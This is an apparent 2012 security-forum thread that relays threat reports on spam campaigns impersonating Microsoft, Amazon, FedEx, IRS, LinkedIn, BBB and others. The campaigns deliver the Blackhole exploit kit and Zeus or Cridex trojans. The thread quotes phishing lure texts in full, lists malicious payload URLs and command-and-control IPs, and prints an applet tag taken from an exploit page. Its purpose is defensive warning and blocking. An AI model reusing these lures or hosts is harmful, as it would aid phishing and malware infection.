-
SPAM frauds, fakes, and other MALWARE deliveries...
FYI...
Fake MS email phish delivers Zeus via Java vuln ...
- https://isc.sans.edu/diary.html?storyid=14020
Last Updated: 2012-09-01 - "Thanks to Susan Bradley for reporting this to ISC.
We're receiving multiple reports of a phishing campaign using the template from a legitimate Microsoft email regarding Important Changes to Microsoft Services Agreement and Communication Preferences.
The legitimate version of this email is specific to a services agreement seen here*, per a change to Microsoft services as of 27 AUG. The evil version of this email will subject victim to a hyperlink that will send them to a Blackhole-compromised website, which will in turn deliver a fresh Zeus variant... (evil) email including the following header snippet:
Received: from [101.5.162.236] ([101.5.162.236]) by
inbound94.exchangedefender .com (8.13.8/8.13.1) with ESMTP id q7VFDPjO029166
A legitimate header snippet:
Received: from smtpi.msn .com ([65.55.52.232]) by COL0-MC3-F43.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900)
101.5.162.236 is in China, 65.55.52.232 is Microsoft. The legitimate email will include a hyperlink for http://email.microsoft.com/Key-98503...15.C.KK.DlNkNK , which points to the above mentioned services agreement.
(Obfuscated to protect the innocent): The phishing mail will instead include a hyperlink to the likes of allseasons****.us, radiothat****.com, and likely a plethora of others. I assessed radiothat****.com and was redirected to 209.x.y.14 which is running the very latest Blackhole evil as described on 28 AUG by Websense in this post**.
Source code review of the web page served included <applet/code="ndshesa.ndshesf"/archive="Leh.jar"><param/nam=123 name=uid value="N013:011:011:04:037:061:061:047:034:076:074:0102:076:074:
047:047:047:074:067:053:061:04:074:04:013:04:075:054:071:034:067:053:
034:034:02:065:071:034"/></applet>
The VirusTotal link for Leh.jar is here(3), and the VirusTotal link for the Zeus variant offered is here(4)...
Contemplate disabling Java(5) until the -next- update(6) is released..."
* http://windows.microsoft.com/en-US/w...ices-agreement
** http://community.websense.com/blogs/...ploit-kit.aspx
3) https://www.virustotal.com/file/2510...8bc9/analysis/
File name: Leh.jar
Detection ratio: 8/42
Analysis date: 2012-09-01 05:28:51 UTC
4) https://www.virustotal.com/file/98bb...is/1346461231/
File name: updateflashplayer.exe
Detection ratio: 6/42
Analysis date: 2012-09-01 01:00:31 UTC
5) http://krebsonsecurity.com/how-to-un...m-the-browser/
6) https://isc.sans.edu/diary.html?storyid=14017
___
101.5.162.236
101.5.0-255.*
inetnum: 101.5.0.0 - 101.5.255.255
netname: TSINGHUA-CN
country: CN
origin: AS4538
http://www.google.com/safebrowsing/d...c?site=AS:4538
... 231 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-02, and the last time suspicious content was found was on 2012-09-02... We found 27 site(s)... that infected 743 other site(s).
___
- https://krebsonsecurity.com/2012/08/...ged-two-flaws/
"... If you want to test whether you’ve successfully disabled Java, check out Rapid7's page, http://www.isjavaexploitable.com/ ."
:sad: :mad:
-
Fake Amazon email exploits recent Java vuln ...
FYI...
Fake ‘Amazon order’ email exploits recent Java vuln ...
- http://community.websense.com/blogs/...erability.aspx
03 Sep 2012 - "... Websense... has detected a new malicious email campaign purporting to be an order verification email from Amazon directing victims to a page containing the recent Java exploit. If successful, this exploit could allow the cyber-criminals behind this campaign to deliver further malicious payloads to the victim’s machine which, for example, could lead to the exfiltration of personal and financial data. Oracle have released an out-of-band patch for this Java vulnerability (Oracle release Java 1.7.0_07 to fix CVE-2012-4681*)... On 1st September, Websense... intercepted over 10,000 malicious emails with the subject ‘You Order With Amazon.com’ enticing the recipient to ‘click here’ to verify a fictitious order as shown in this sample:
> http://community.websense.com/cfs-fi...2D00_550x0.jpg
Once the victim has clicked the link, they are redirected to an obfuscated page hosting the Blackhole Exploit Kit... an analysis of this file can also be found on VirusTotal**..."
* http://community.websense.com/blogs/...2012-4681.aspx
** https://www.virustotal.com/file/2510...8bc9/analysis/
File name: 9c5abf8889c34b3a36c6699b40ef6717c95ac6e1
Detection ratio: 12/42
Analysis date: 2012-09-03
:mad:
-
Fake Google email contains a trojan ...
FYI...
Another round of "Spot the Exploit E-Mail"
- https://isc.sans.edu/diary.html?storyid=14029
Last Updated: 2012-09-04 - "We have come to expect quality phishing/fake email work these days...
> https://isc.sans.edu/diaryimages/amexemail1.png
> https://isc.sans.edu/diaryimages/amexemail2.png
> https://isc.sans.edu/diaryimages/amexemail3.png
... javascript will then -redirect- the user to one of these two IP addresses:
96.47.0.163, 108.178.59.26
both IP addresses yield heavily obfuscated javascript. The wepawet analysis can be found here:
- http://wepawet.iseclab.org/view.php?...69729c&type=js
It appears to be the usual "what vulnerable plugin are you running today?" javascript."
___
Fake Google email contains a trojan ...
- http://h-online.com/-1698349
04 Sep 2012 - "Unknown attackers are attempting to persuade email recipients to open attachments that contain a trojan by claiming to be from The Google Accounts Team. A new email supposedly from "accounts-noreply @google .com" with the subject "Suspicious sign in prevented" is being sent en masse -claiming- that a hijacker has attempted to access the mail recipient's Google Account. The message says that the sign-in attempt was prevented but asks users to refer to the attached file for details of the attempted intrusion. However, instead of containing information such as the IP address of the log-in attempt, the attached zip file contains a Windows executable file that will install a trojan onto a victim's system. While Google does sometimes send emails like this to users, they -never- contain attachments; users that receive such an email are advised to delete them. According to VirusTotal*, the trojan is currently only detected by just half of 42 anti-virus programs..."
* https://www.virustotal.com/file/df0b...c23a/analysis/
File name: Google_Accounts_Alert-3944-J5I-4169.zip
Detection ratio: 21/42
Analysis date: 2012-09-04 09:25:32 UTC
___
Fake ‘Wire Transfer Confirmation’ emails lead to Black Hole exploit kit ...
- http://blog.webroot.com/2012/09/04/s...e-exploit-kit/
Sep 4, 2012 - "Over the past 24 hours, cybercriminals started spamvertising millions of emails impersonating the United Parcel Service (UPS) in an attempt to trick end and corporate users into previewing a malicious .html attachment. Upon previewing it, a tiny iFrame attempts to contact a client-side exploits serving a landing URL, courtesy of the Black Hole web malware exploitation kit.
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Sample exploits served: CVE-2010-0188; CVE-2010-1885
Upon successful client-side exploitation, the campaign drops MD5: 7fe4d2e52b6f3f22b2f168e8384a757e * ..."
* https://www.virustotal.com/file/932f...fd00/analysis/
File name: 7fe4d2e52b6f3f22b2f168e8384a757e
Detection ratio: 32/42
Analysis date: 2012-08-28
___
Fake LinkedIn spam leads to malware ...
- http://blog.dynamoo.com/2012/09/link...85926-and.html
4 Sep 2012 - "This fake LinkedIn spam leads to malware on 108.178.59.26 and myasuslaptop .com:
Date: Tue, 04 Sep 2012 10:43:03 +0100
From: "noreply" [noreply@linkedin.com]
Subject: Link LinkedIn Mail
LinkedIn
REMINDERS
Invitation reminders:
• From Charlie Alexander (Mexico Key Account Director at Quanta)
PENDING MESSAGES
• There are a total of 5 messages awaiting your response. Visit your InBox now.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission. © 2012, LinkedIn Corporation.
The malicious payload (report here*)..."
* http://wepawet.iseclab.org/view.php?...746065&type=js
Detection results
Detector Result
Jsand 2.3.4 malicious
In particular, the following URL was found to contain malicious content:
hxxp :// 108.178.59.26 /bv6rcs3v1ithi.php?w=6de4412e62fd13be
Exploits
Name Description Reference
HPC URL Help Center URL Validation Vulnerability CVE-2010-1885 ...
... My personal preference with any emails purporting to be from LinkedIn is to block them at the perimeter. As far as most businesses are concerned it is simply a playground for recruiters trying to poach your staff."
:mad: :mad:
-
Fake 'QuickBooks Update: Urgent’ emails lead to BlackHole exploit kit
FYI...
Fake 'QuickBooks Update: Urgent’ emails lead to Black Hole exploit kit
- http://blog.webroot.com/2012/09/05/i...e-exploit-kit/
Sep 5, 2012 - "... cybercriminals behind the recently profiled ‘Intuit Marketplace’ themed campaign resume impersonating Intuit, with a newly launched round consisting of millions of Intuit themed emails. The theme this time? Convincing users that in order to access QuickBooks they would have to install the non-existent Intuit Security Tool. In reality though, clicking on the links points to a Black Hole exploit kit landing URL that ultimately drops malware on the affected hosts...
Screenshot of a sample spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Client-side exploits serving URL: hxxp ://roadmateremove .org /main.php?page=9bb4aab85fa703f5 - 89.248.231.122; 208.91.197.27
... Name servers part of the campaign’s infrastructure:
ns1.chemrox .net – 208.91.197.27; 173.234.9.17
ns2.chemrox .net – 7.25.179.23
Upon successful client-side exploitation, the campaign drops MD5: f621be555dc94a8a370940c92317d575 * ...
* https://www.virustotal.com/file/eee0...8137/analysis/
File name: f621be555dc94a8a370940c92317d575
Detection ratio: 33/42
Analysis date: 2012-09-01
...Once executed, the sample phones back to 87.120.41.155 :8080/mx5/B /in. We’ve already seen the same command and control IP used in the following previously profiled malicious campaigns..."
:mad:
-
Bogus greeeting card emails serve exploits and malware
FYI...
Bogus greeeting card emails serve exploits and malware
- http://blog.webroot.com/2012/09/06/c...s-and-malware/
Sep 6, 2012 - "Remember the recently profiled 123greetings .com themed malicious campaign? It appears that over the past 24 hours, the cybercriminals behind it have resumed spamvertising millions of emails pointing to additional compromised URLs in a clear attempt to improve their click-through rates...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Detection rate for a sample Java script redirection: MD5: 75e030e741875d29f12b179f2657e5fd* – ... Trojan.JS.Iframe.aby; Trojan.Webkit!html
Upon successful client-side exploitation, the campaign drops MD5: 864e1dec051cbd800ed59f6f91554597** – ... W32/Yakes.AP!tr
Once executed, the malware phones back to 216.38.12.158 :8080/mx/5/B/in... Another domain is known to have been responding to the same IP in the past..."
* https://www.virustotal.com/file/dcb5...is/1346492654/
File name: greetings.html
Detection ratio: 5/42
Analysis date: 2012-09-01
** https://www.virustotal.com/file/df92...1ffc/analysis/
File name: 97273d9507c8d78679c8cdf591715760aef0c59c
Detection ratio: 24/42
Analysis date: 2012-09-03
:mad:
-
$100 billion in losses to cybercrime
FYI...
$100 billion in losses to cybercrime ...
- http://h-online.com/-1701983
6 Sep 2012 - "According to Symantec's 2012 Norton Cybercrime Report*, worldwide, private individuals have suffered approximately $100 billion (more than £69 billion at the current exchange rate) in financial losses as a result of cybercrime. In the period from July 2011 to July 2012, losses averaged $197 (£124) per victim. A total of 556 million adults are reported to have fallen victim to malware, phishing or similar virtual crimes. The report claims that there are 1.5 million victims of cybercrime each day, or about 18 per second. The security specialist's report also states that two-thirds of internet users have been caught out by cybercriminals at some point in their lives, and almost half (46%) were victims during the period covered by the report... Around 40% of people don't use complex passwords or don't change their passwords regularly. There appears to be a clear trend of cybercriminals targeting social networks and mobile devices, with around 20% of users having suffered losses as a result of such attacks. The study also claims that 15% of social media accounts have been compromised and that 10% of users have fallen for fake links and scams on social networks. A total of 75% of those surveyed believe that cybercriminals are increasingly targeting social networking services. Losses within the EU are reported to amount to $16 billion (over £10 billion). China emerges as the country whose citizens have suffered the greatest financial loss – $46 billion (nearly £29 billion) – while Russia has the largest number of victims, with 92% of users surveyed in the country having experienced problems with cybercrime. The report surveyed more than 13,000 online adults aged 18-64 in 24 different countries."
* http://www.symantec.com/about/news/r...id=20120905_02
Sept. 5, 2012
___
- http://yro.slashdot.org/story/12/09/...ut-just-as-bad
Sep 6, 2012
> http://blogs.cio.com/security/17375/...ages-disappear
:mad::mad::mad:
-
Fake FedEx spam 2012.09.07 ...
FYI...
FedEx spam ...
- http://blog.dynamoo.com/2012/09/fede...allerynet.html
7 Sep 2012 - "Two fake FedEx campaigns... with different payload sites of dushare .net and gsigallery .net. In the first case, the malicious payload is... (report here*) hosted on 203.91.113.6 (G Mobile, Mongolia). In the second case the payload is... (report here**) also hosted on 203.91.113.6..." (More detail at the URL above.)
* http://wepawet.iseclab.org/view.php?...043407&type=js
Detector Result
Jsand 2.3.4 malicious
** http://wepawet.iseclab.org/view.php?...038935&type=js
Detector Result
Jsand 2.3.4 malicious
- http://google.com/safebrowsing/diagn...sigallery.net/
"Site is listed as suspicious... The last time Google visited this site was on 2012-09-07, and the last time suspicious content was found on this site was on 2012-09-07. Malicious software includes 9 trojan(s), 1 scripting exploit(s)..."
- http://google.com/safebrowsing/diagn...e=dushare.net/
"Site is listed as suspicious... The last time Google visited this site was on 2012-09-07, and the last time suspicious content was found on this site was on 2012-09-07. Malicious software includes 2 trojan(s), 1 scripting exploit(s)..."
___
- http://blog.dynamoo.com/2012/09/fede...onahannet.html
7 Sep 2012 - "... fake FedEx spam leads to malware on studiomonahan .net... The malicious payload is... (report here*) hosted on 206.253.164.43 (Hostigation, US)...
(More detail at the URL above.)
* http://wepawet.iseclab.org/view.php?...947943&type=js
Detector Result
Jsand 2.3.4 malicious
:mad:
-
Fake BBB email phish/Spam leads to malware
FYI...
Fake BBB email phish/Spam leads to malware
- https://isc.sans.edu/diary.html?storyid=14053
Last Updated: 2012-09-09 - "We received another piece of spam... pretending to be from the Better Business Bureau. Analysis of the file transferred (W6w8sCyj.exe) from prog .it appears to be a piece of malware (Win32/Cridex.Q) use to communicates via SSL with a C&C server... List of domains/IP to watch for and block:
ajaxworkspace .com, prog .it, la-liga .ro, ejbsa .com .ar, technerds .ca, 108.178.59.12
The email looks like this:
Better Business Bureau©
Start With Trust©
Sat, 08 Sep 2012 01:54:02 +0700
RE: Case # 78321602 <hxxp [:]//prog .it/EH564Bf/index.html>
Dear Sirs,
The Better Business Bureau has got the above mentioned complaint from one of your customers concerning their business relations with you. The details of the consumer's concern are contained in attached document. Please give attention to this case and advise us of your opinion as soon as possible. We encourage you to open the COMPLAINT REPORT to answer on this complaint.
We look forward to your prompt response.
Faithfully yours,
Ann Hegley
Dispute Counselor
Better Business Bureau
[1] http://anubis.iseclab.org/?action=re...a4&format=html
[2] http://wepawet.iseclab.org/view.php?...109082&type=js
[3] http://wepawet.iseclab.org/view.php?...109182&type=js
[4] http://wepawet.iseclab.org/view.php?...109422&type=js
[5] https://www.virustotal.com/file/126e...9187/analysis/
File name: vt_20541851.@
Detection ratio: 3/42
Analysis date: 2012-09-08
[6] http://www.microsoft.com/security/po...Win32%2fCridex
:mad:
-
Fake US Airways email spam...
FYI...
Fake US Airways email spam ...
- http://blog.dynamoo.com/2012/09/us-a...sgrovenet.html
11 Sep 2012 - "A couple of samples of a fake US Airways spam email leading to malware on blue-lotusgrove .net:
Date: Tue, 11 Sep 2012 15:32:42 -0300
From: "US Airways - Reservations" [reservations @myusairways .com]
Subject: Please confirm your US Airways online registration...
Date: Tue, 11 Sep 2012 23:29:14 +0700
From: "US Airways - Reservations" [intuitpayroll @e.payroll.intuit .com]
Subject: US Airways online check-in...
The malicious payload is at [donotclick]blue-lotusgrove .net/main.php?page=559e008e5ed98bf7 (report here*) hosted on 203.91.113.6 (G Mobile, Mongolia), the same IP used in this attack**... domains on the same server... can all be considered to be malicious...
(More detail/URL list at the dynamoo URL above.)
* http://wepawet.iseclab.org/view.php?...388149&type=js
Detector Result
Jsand 2.3.4 malicious
** http://blog.dynamoo.com/2012/09/fede...allerynet.html
___
- http://security.intuit.com/alert.php?a=57
Last updated 9/13/2012
:mad:
-
Fake ADP emails, voice mail notifications lead to Blackhole Exploit Kit
FYI...
Fake ADP emails, voice mail notifications lead to Blackhole Exploit Kit
- http://community.websense.com/blogs/...ploit-kit.aspx
13 Sep 2012 - "Since Blackhole Exploit Kit 2.0* was recently introduced, we wanted to give our readers a few examples of how they might get exposed to this threat through email. Websense... has recently intercepted a few malicious email campaigns that try to lure the victims to Web pages that host this popular exploit kit... One posed as voice mail notifications from Microsoft Exchange servers, another mimicked ADP invoice reminders, and a third thanked the recipient for signing up for a premium service of accountingWEB.com... A lot of the email messages pretend to come from trusted sources (well-known establishments, or the victim's own infrastructure), and try to catch the reader off-guard by focusing their attention on something urgent, like money matters... The malicious emails contain links that redirect to Blackhole pages with new obfuscation, but we don't think these are Blackhole 2.0. We suspect it won't be long, though, until we come across similar campaigns that use the new version. ADP is one the largest names in payroll services... Here's an example marked as high priority, with the subject line "ADP Invoice Reminder":
> http://community.websense.com/cfs-fi..._5F00_blur.jpg
... one of the possible redirection paths:
hxxp ://allbarswireless .com/HXwcDdQ/index.html
hxxp ://ash-polynesie .com/AjVSXvus/js.js
hxxp ://108.60.141.7 /tfvsfios6kebvras .php?r=dwtd6xxjpq8tkatb
hxxp ://108.60.141.7 /links/ differently-trace.php ...
Here's a different lure - emails pretending to come from the victim's Exchange server, telling them that they have new voice mail. The text invites the reader to click the link: "Double click on the link to listen the message." Subject lines include "Voice Mail from NNN-NNN-NNNN (NN seconds)":
>
http://community.websense.com/cfs-fi...5F00_blur1.jpg
... redirection chain here is similar:
hxxp ://www.tryakbar .com/tLbM3r/index.html
hxxp ://sportmania .so/JP3q2538/js.js
hxxp ://173.255.221.74 /tfvsfios6kebvras .php?r=rs3mwhukafbiamcm ...
Another scheme thanks the user for signing up for a premium service. Subject lines include "Thank you for activating paid services":
> http://community.websense.com/cfs-fi..._5F00_blur.jpg
Different redirection chain, but the landing page hosts Blackhole, with a very familiar path:
hxxp ://www.svstk. ru/templates/beez/check.php
hxxp ://bode-sales .net/main.php?page=3c23940fb7350489
And finally, the familiar theme of FDIC notifications claiming your wire transfer ability was suspended. Subject lines include "You need a new security version," "Suspended transactions," and "Urgent! You must install a new security version!"
> http://community.websense.com/cfs-fi..._5F00_blur.jpg
Here again, simple redirection leads to typical "/main.php?page=" type URLs.
hxxp ://kahvikuppi .org/achsec.html
hxxp ://afgreenwich .net/main.php?page=0f123fe645ddf8d7
Note that as part of the update to Blackhole 2.0, we are much more likely to see URLs like those used in the first two examples, rather than the latter two, due to the dynamic URL generation capability."
* http://community.websense.com/blogs/...es-to-2-0.aspx
- https://isc.sans.edu/diary.html?storyid=14098
2012-09-14
ADP spam ...
- http://blog.dynamoo.com/2012/09/adp-...624937122.html
13 Sep 2012 - "... fake ADP spam tries to load malware from 46.249.37.122... After clicking the link bouncing through a couple of redirectors, the victim ends up at [donotclick]46.249.37.122 /links/systems-links_warns.php which appears to be generating a 404 error (although it could be fake). This could be a legitimate but hacked server as it is also the IP address for a proxy service called dutchprox.com. In any case, you might decide you want to block the IP just in case."
- http://www.bbb.org/blog/wp-content/u...scamalert1.jpg
Sep 12, 2012
___
- http://blog.commtouch.com/cafe/data-...re-campaign-2/
Sep 13, 2012
:fear::mad:
-
Fake Fedex email invoice lead to BlackHole Exploit kit
FYI...
Fake Fedex email invoice lead to BlackHole Exploit kit
- http://blog.webroot.com/2012/09/14/s...e-exploit-kit/
Sep 14, 2012 - "... cybercriminals have launched yet another massive spam run, this time impersonating FedEx in an attempt to trick its customers into clicking on a malware and exploits-serving URL found in the malicious email...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Sample client-side exploits serving URLs: hxxp ://studiomonahan .net/main.php?page=2bfd5695763b6536 (200.42.159.6, AS10481; 206.253.164.43, AS6921); hxxp ://gsigallery .net/main.php?page=2bfd5695763b6536 (208.91.197.54, AS40034)
Sample client-side exploits served: CVE-2010-1885
Detection rate for a sample Java script redirector: MD5: 32a74240c7e1a34a2a8ed8749758ef15* ...
JS/Iframe.FR; Trojan-Downloader.JS.Iframe.dbe; JS/Exploit-Blacole.hd
Upon successful client-side exploitation, the campaign drops MD5: f9904f305de002ad5c0ad4b4648d0ca7** ... Trojan.Win32.Obfuscated.aopm; Worm:Win32/Cridex.E
... and MD5: 0e2c968865d34c8570bb69aa6156b915*** Worm.Win32.Cridex.jb
The first sample phones back to 195.111.72.46 :8080/mx/5/B/in/ (AS1955) and to 87.120.41.155 :8080/mx/5/B/in (AS13147), and the second sample initiates DNS queries to droppinlever .pro; lambolp700tuning .ru and it also produces TCP traffic to 146.185.220.32 on port 443, as well as to 192.5.5.241 again on port 443.
... We’ve already seen numerous malicious campaigns phoning back one of these command and control servers, 87.120.41.155 :8080/mx/5/B/in in particular..."
* https://www.virustotal.com/file/ae6b...is/1347545788/
File name: Fedex.html
Detection ratio: 8/41
Analysis date: 2012-09-13
** https://www.virustotal.com/file/b417...9ba0/analysis/
File name: f9904f305de002ad5c0ad4b4648d0ca7.malware
Detection ratio: 30/42
Analysis date: 2012-09-13
*** https://www.virustotal.com/file/cb66...4a47/analysis/
File name: a36fc381c480e4e7ee09c89d950195c2
Detection ratio: 24/42
Analysis date: 2012-09-11
:fear: :mad:
-
Multiple fake emails/SPAM lead to malware...
FYI...
Multiple fake emails/SPAM lead to malware...
"Photos" Spam...
- http://blog.dynamoo.com/2012/09/phot...reuomopru.html
18 Sept 2012 14:43 - "This spam leads to malware ondiareuomop .ru:
From: Carleen Garrett
Sent: Tuesday, September 18, 2012 3:17:33 PM
Subject: Photos
Hi,
as promised your photos - hxxp ://flyershot .com/gallery.htm
The payload is at [donotclick]diareuomop.ru:8080/forum/links/column.php hosted on the following IPs: 50.56.92.47, 203.80.16.81, 46.51.218.71
These IPs are a subset of the ones found here*. Block 'em if you can."
Fake Intuit email/Spam...
* http://blog.dynamoo.com/2012/09/intu...eloffceru.html
17 Sept 2012 22:41 - "This fake Intuit.com spam attempts to load malware from kerneloffce .ru:
Date: Mon, 17 Sep 2012 08:54:50 -0600
From: "Mason Jordan" [LillieRoell@digitalnubia.com]
Subject: Your Intuit.com software order.
Attachments: Intuit_Order_A49436.htm
Dear customer: Thank you for ordering from Intuit Market. We are processing and will message you when your order ships. If you ordered multiple items, we may sned them in more than one delivery (at no extra cost to you) to ensure quicker delivery. If you have questions about your order please call 1-900-130-1601 ($4.79/min).
ORDER INFORMATION
Please download your complete order id #1197744 from the attachment.(Open with Internet Explorer)
2012 Intuit, Inc. All rights reserved. Intuit, the Intuit Logo, Quickbooks, Quicken and TurboTax, among others, are registered trademarks of Intuit Inc.
The malicious payload is at kerneloffce .ru:8080/forum/links/column.php which was hosted on 46.51.218.71 (Amazon, Ireland) until it got nuked..."
> http://google.com/safebrowsing/diagn...erneloffce.ru/
"Site is listed as suspicious - visiting this web site may harm your computer... the last time suspicious content was found on this site was on 2012-09-17. Malicious software includes 1 trojan(s)... this site has hosted malicious software over the past 90 days. It infected 4 domain(s)..."
Fake IRS email/Spam...
- http://blog.dynamoo.com/2012/09/irs-...achingnet.html
17 Sept 2012 22:30 - "This spam leads to malware on virtual-geocaching .net:
Date: Mon, 17 Sep 2012 11:28:14 -0600
From: Internal Revenue Service [tangierss4 @porterorlin .com]
Subject: IRS report of not approved tax transfer
Your State Tax transfer (ID: 30062091798009), recently sent from your checking account was returned by Internal Revenue Service payment processing unit.
Not Accepted Tax transaction
Tax Transaction ID: 30062091798009
Reason of rejection See details in the report below
Federal Tax Transaction Report tax_report_30062091798009.doc (Microsoft Word Document)
Internal Revenue Service 3192 Aliquam Rd. Davis 71320 VA
The malicious payload is at [donotclick]virtual-geocaching .net/main.php?page=7de3f5c4200c896e (report here) on 203.91.113.6 (G Mobile, Mongolia) as used in this recent attack and several others..."
> http://google.com/safebrowsing/diagn...eocaching.net/
"Site is listed as suspicious - visiting this web site may harm your computer... the last time suspicious content was found on this site was on 2012-09-17. Malicious software includes 57 trojan(s), 8 exploit(s), 3 scripting exploit(s)..."
Fake IRS email/Spam...
- http://blog.dynamoo.com/2012/09/irs-...mmwrapnet.html
17 Sept 2012 16:06 - "This fake IRS spam leads to malware on thebummwrap .net:
From: Internal Revenue Service [mailto:fascinatesh07 @deltamar .net]
Sent: 17 September 2012 15:30
Subject: Your federal tax transaction has been not accepted
Your State Tax transaction (ID: 60498447771657), recently initiated from your bank account was canceled by The Electronic Federal Tax Payment System.
Not Accepted Tax transaction
Tax Transaction ID: 60498447771657
Rejection code See details in the report below
Income Tax Transaction Report tax_report_60498447771657.doc (Microsoft Word Document)
Internal Revenue Service Ap #822-9450 Cum Avenue Edmond 33020 MI
The malicious payload is at [donotclick]thebummwrap .net/main.php?page=7de3f5c4200c896e hosted on 203.91.113.6 (G Mobile Mongolia) which has been used several times recently for evil purposes..."
___
- http://tools.cisco.com/security/cent...utbreak.x?i=77
Last Updated September 18, 2012
:mad::mad:
-
Fake US Airways emails serve exploits and malware
FYI...
Fake US Airways emails serve exploits and malware ...
- http://blog.webroot.com/2012/09/18/s...s-and-malware/
Sep 18, 2012 - "Cybercriminals are currently spamvertising millions of emails impersonating U.S Airways, in an attempt to trick users into clicking on the malicious links found in the legitimately looking emails...
Sample screenshot of the spamvertised US Airways themed email:
> https://webrootblog.files.wordpress....explot_kit.png
Sample client-side exploits served: http://web.nvd.nist.gov/view/vuln/de...=CVE-2010-1885 - 9.3 (HIGH)
Responding to the same IP 203.91.113.6 (AS24559) ...
Detection rate for a sample Java script redirection: MD5: 5c5a3c6e91c1c948c735e90009886e37 *
... Mal/Iframe-W
Upon successful client-side exploitation, the campaign drops MD5: 9069210d0758b34d8ef8679f712b48aa **
... Trojan.Winlock.6049; W32/Cridex.R
Upon execution, the sample phones back to 199.71.213.194 :8080/mx/5/B/in/ (AS40676).
More MD5s are known to have phoned back to the same IP..."
* https://www.virustotal.com/file/08cb...is/1347403787/
File name: Airways.html
Detection ratio: 3/42
Analysis date: 2012-09-11
** https://www.virustotal.com/file/c6c8...b59a/analysis/
File name: readme.exe
Detection ratio: 6/42
Analysis date: 2012-09-14
:mad:
-
Malicious UPS/FedEx emails re: iPhone 5 orders
FYI...
Malicious UPS/FedEx emails re: iPhone 5 orders ...
- http://community.websense.com/blogs/...-iphone-5.aspx
18 Sep 2012 - "The first batch of iPhone 5s will be delivered on Friday of this week... From reading discussion forums online... all orders from Apple's online store will ship with UPS... when I received a UPS notification email today, I obviously expected it to be about my iPhone. Turns out, it wasn't.
> http://community.websense.com/cfs-fi...ion_5F00_1.png
... the email contained an attached HTML page that, when loaded, displayed the page below:
> http://community.websense.com/cfs-fi...00_browser.png
... the risk is great that recipients will have their guards down and will run the attached file... There's a hidden, obfuscated script on the page... it loads an iframe from a .RU domain, which is a Blackhole Exploit Kit site that pushes a banking trojan to the PC... the phrase used for the .RU domain name translates to "money on account". Banking trojan, money on account... be extra careful if you're waiting for a delivery notification, and don't run any attachments contained in those types of emails."
___
(More) Fake UPS e-mail messages ...
> http://tools.cisco.com/security/cent...?alertId=25171
Sep 19, 2012
:mad:
-
Fake FDIC emails serve client-side exploits and malware
FYI...
Fake FDIC emails serve client-side exploits and malware
- http://blog.webroot.com/2012/09/19/c...s-and-malware/
Sep 19, 2012 - "... cybercriminals started spamvertising millions of emails impersonating the Federal Deposit Insurance Corporation (FDIC), in an attempt to trick businesses into installing a bogus and non-existent security tool promoted in the emails. Upon clicking on the links, users are exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised FDIC impersonating email:
> https://webrootblog.files.wordpress....xploit_kit.png
Once the user clicks on the malicious link, he’s exposed to the following bogus “Page loading…” page:
> https://webrootblog.files.wordpress....oit_kit_01.png
Client-side exploits serving URL: hxxp ://afgreenwich .net/main.php?page=0f123fe645ddf8d7 - 203.91.113.6 (AS24559)...
Upon successful client-side exploitation, the campaign drops MD5: 3ce1ae2605aa800c205ef63a45ffdbfa *
... Trojan-Ransom.Win32.Gimemo.aovu; W32.Cridex
Once executed, it attempts to phone back to 72.167.253.106 :8080/mx/5/B/in (AS26496)...
More MD5s are known to have phoned back to the same IP in the past, for instance:
MD5: 97974153c25baf5826bf441a8ab187a6 **
...Trojan.Win32.Jorik.Zbot.fxq; Gen:Variant.Zusy.17989
... and MD5: 9069210d0758b34d8ef8679f712b48aa ***
... Trojan.Winlock.6049; W32/Cridex.R ..."
* https://www.virustotal.com/file/8774...8c93/analysis/
File name: b9126f7be02c682d7b1b534c928881a0aba6ae0c
Detection ratio: 25/42
Analysis date: 2012-09-16
** https://www.virustotal.com/file/4b9a...325b/analysis/
File name: test73608696665548.bin
Detection ratio: 16/42
Analysis date: 2012-09-13
*** https://www.virustotal.com/file/c6c8...b59a/analysis/
File name: readme.exe
Detection ratio: 6/42
Analysis date: 2012-09-14
___
New Malware Sites using Blackhole Exploit Kit v2.0
- https://blog.opendns.com/2012/09/18/...loit-kit-v2-0/
Sep 18, 2012
:mad: :mad:
-
LinkedIn SPAM - Blackhole Exploit Kit v2.0...
FYI...
LinkedIn SPAM / 69.194.201.21
- http://blog.dynamoo.com/2012/09/link...919420121.html
22 Sep 2012 - "This fake LinkedIn spam leads to malware on 69.194.201.21:
Date: Sat, 22 Sep 2012 15:16:47 -0500
From: "Reminder" [CC8504C0E@updownstudio.com]
Subject: LinkedIn: New messages awaiting your response
LinkedIn
REMINDERS
Invitation reminders:
From Emilio Byrd (Insurance Manager at Wolseley)
PENDING MESSAGES
There are a total of 88 message(-s) awaiting your response. Go to InBox now.
This message was sent to [redacted]. This is an occasional email to help you get the most out of LinkedIn.
Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission.
2012, LinkedIn Corporation.
The malicious payload is at [donotclick]69.194.201.21 /links/deep_recover-result.php (Solar VPS, US) which appears to be a Blackhole 2 exploit kit. Blocking this IP address would be prudent."
___
Fake 'KLM e-Ticket' attempts to install backdoor
- http://community.websense.com/blogs/...-backdoor.aspx
21 Sep 2012 - "... malicious zipped attachment..."
___
New Malware Sites using Blackhole Exploit Kit v2.0
- https://blog.opendns.com/2012/09/18/...loit-kit-v2-0/
Sep 18, 2012
:fear: :mad:
-
BBB malicious SPAM flood
FYI...
BBB malicious SPAM flood
- http://community.websense.com/blogs/...pam-flood.aspx
24 Sep 2012 - "... another barrage of malicious BBB (Better Business Bureau) complaint notifications... Websense.. has detected and intercepted a marked increase in BBB malicious email this month... In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."
> http://community.websense.com/cfs-fi...D00_Image1.png
... a number of different subjects have been utilized for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs"...
> http://community.websense.com/cfs-fi...2D00_550x0.png
